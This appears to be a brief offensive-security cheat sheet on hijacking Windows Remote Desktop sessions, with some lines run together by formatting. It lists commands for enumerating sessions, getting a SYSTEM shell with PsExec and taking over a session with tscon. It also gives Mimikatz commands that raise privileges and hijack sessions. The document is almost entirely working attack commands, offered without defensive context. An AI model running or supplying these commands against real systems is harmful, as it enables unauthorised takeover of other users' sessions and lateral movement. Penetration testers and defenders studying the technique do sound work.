Hijack RDP session
Built-in Windows tools
Get all active sessions:
powershell
query userUse PsExec for a SYSTEM shell:
powershell
PSExec64.exe -s cmd.exe
cmd /k tscon 3 /dest:rdp-tcp#1Take session:
powershell
tscon 4Mimikatz
Enable privileges:
powershell
privilege::debug
token::elevateList RDP sessions:
powershell
ts::sessionsHijack session:
powershell
ts::remote /id:2